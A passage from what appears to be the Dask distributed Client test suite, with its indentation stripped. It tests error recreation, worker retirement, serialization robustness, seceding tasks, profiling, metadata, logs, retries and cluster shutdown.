with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: 1 / x)
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ZeroDivisionError):
function(*args, **kwargs)
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
def make_err(x):
# because pandas would happily work with NaN
if x == 0:
raise ValueError
return x
df2 = df.a.map(make_err)
f = c.compute(df2)
function, args, kwargs = await c._recreate_error_locally(f)
with pytest.raises(ValueError):
function(*args, **kwargs)
# with persist
df3 = c.persist(df2)
function, args, kwargs = await c._recreate_error_locally(df3)
with pytest.raises(ValueError):
function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
da = pytest.importorskip("dask.array")
pytest.importorskip("scipy")
z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
zz = z.persist()
func, args, kwargs = await c._recreate_error_locally(zz)
assert "0.,0.,0." in str(args).replace(" ", "") # args contain actual arrays
def test_recreate_error_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 1)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, x, y)
f = c.compute(tot)
with pytest.raises(ZeroDivisionError):
c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
start = time()
while a.status != Status.closed:
await asyncio.sleep(0.01)
assert time() < start + 5
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
start = time()
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert time() < start + 2
assert distributed.foo == 123
finally:
del distributed.foo
start = time()
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert time() < start + 2
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(loop=loop, processes=False, threads_per_worker=4) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
start = time()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=r"^{}$".format(msg)):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1, timeout=100)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@pytest.mark.flaky(reruns=10, reruns_delay=5)
@pytest.mark.slow
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2, timeout=60)
async def test_secede_balances(c, s, a, b):
count = threading.active_count()
def f(x):
client = get_client()
sleep(0.01) # do some work
secede()
futures = client.map(slowinc, range(10), pure=False, delay=0.01)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(100))
start = time()
while not all(f.status == "finished" for f in futures):
await asyncio.sleep(0.01)
assert threading.active_count() < count + 50
assert time() < start + 60
assert len(a.log) < 2 * len(b.log)
assert len(b.log) < 2 * len(a.log)
results = await c.gather(futures)
assert results == [sum(map(inc, range(10)))] * 100
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def f():
client = get_client()
client.submit(slowinc, 1, delay=0.2, key="slowinc")
future = c.submit(f, key="f")
await asyncio.sleep(0.1)
if len(s.tasks) == 2:
assert (
s.priorities["f"] > s.priorities["slowinc"]
) # lower values schedule first
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def _test_dynamic_workloads_sync(c, delay):
future = c.submit(_dynamic_workload, 0, delay=delay)
assert future.result(timeout=40) == 52
def test_dynamic_workloads_sync(c):
_test_dynamic_workloads_sync(c, delay=0.02)
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
_test_dynamic_workloads_sync(c, delay="random")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = type("")
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = type("")
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(
loop=loop, scheduler_port=0, dashboard_address=None, silence_logs=False
) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
ts = a.tasks.get(future.key)
if ts is not None and ts.state == "executing":
w = a
else:
w = b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing_count else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
start = time()
while future.status != "finished":
await asyncio.sleep(0.01)
assert time() < start + 1
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text or "1.91 MiB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster()
async def test_scatter_direct(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
start = time()
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
assert time() < start + 5
await c.close()
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
d = {"a": 1}
result = await c.submit(d.get, "a")
assert result == 1
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@pytest.mark.asyncio
async def test_dashboard_link_inproc(cleanup):
async with Client(processes=False, asynchronous=True) as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.httpserver
import tornado.web
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
async def test(s, a, b):
np = pytest.importorskip("numpy")
async with Client(
s.address, asynchronous=True, serializers=["dask", "msgpack"]
) as c:
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
test()
@gen_cluster()
async def test_de_serialization(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=None) as c:
c.close()
c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
def test_no_threads_lingering():
active = dict(threading._active)
assert threading.active_count() < 40, list(active.values())
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*[c.scatter(1, direct=True) for _ in range(5)])
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
with pytest.raises(TimeoutError) as info:
await c.wait_for_workers(n_workers=10, timeout="1 ms")
assert "2/10" in str(info.value).replace(" ", "")
assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
start = proc.num_fds()
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Worker(s.address, nthreads=2) as a, Worker(
s.address, nthreads=2
) as b:
async with Client(s.address, asynchronous=True) as c:
await df.sum().persist()
begin = time()
while proc.num_fds() > begin:
await asyncio.sleep(0.01)
assert time() < begin + 5, (start, proc.num_fds())
@pytest.mark.asyncio
async def test_dashboard_link_cluster(cleanup):
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(processes=False, asynchronous=True) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@pytest.mark.asyncio
async def test_shutdown(cleanup):
async with Scheduler(port=0) as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == Status.closed
assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(n_workers=1, asynchronous=True, processes=False) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@pytest.mark.asyncio
async def test_config_inherited_by_subprocess(cleanup):
def f(x):
return dask.config.get("foo") + 1
with dask.config.set(foo=100):
async with LocalCluster(n_workers=1, asynchronous=True, processes=True) as lc:
async with Client(lc, asynchronous=True) as c:
result = await c.submit(f, 1)
assert result == 101
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
